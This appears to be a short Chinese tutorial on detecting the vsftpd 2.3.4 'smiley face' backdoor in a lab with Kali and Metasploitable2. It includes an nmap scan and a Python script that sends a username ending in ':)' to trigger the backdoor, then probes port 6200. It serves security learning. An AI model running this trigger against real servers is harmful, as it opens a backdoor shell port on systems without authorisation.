Python检测微笑漏洞

一、微笑漏洞介绍

漏洞服务：VSFTPD 2.3.4，俗称笑脸漏洞。存在于这个2.3.4版本，属于开发者设计上的失误。在检测到用户名带有特殊字符`：）`时，会自动打开6200端口。

二、使用工具

攻击机：kali linux
靶机：Metasploitable2

三、检测过程

1.使用Nmap扫描同网段下的主机，得到靶机ip

nmap 192.168.121.0/24

2.在网上找到检测微笑漏洞的python脚本

import socket
from ftplib import FTP
 
url = input("请输入你需要检测的地址：")
ftp = FTP()
username = 'root:)' #用户名必须包含：)这两个字符
password = 'anonymous' #密码随便啥都行
try:
    ftp.connect(url,21,timeout=10)#使用ftp登录，设置延时10秒
    ftp.login(username,password)
    ftp.quit()
except:
    print("完成登录检测")
try:
    s = socket.socket() #使用socket函数来检测是否有漏洞存在
    s.connect((url,6200))
    s.close()
    print("存在微笑漏洞")
except:
    print("没有发现笑脸漏洞！")

3.kali运行并输入靶机ip

检测成功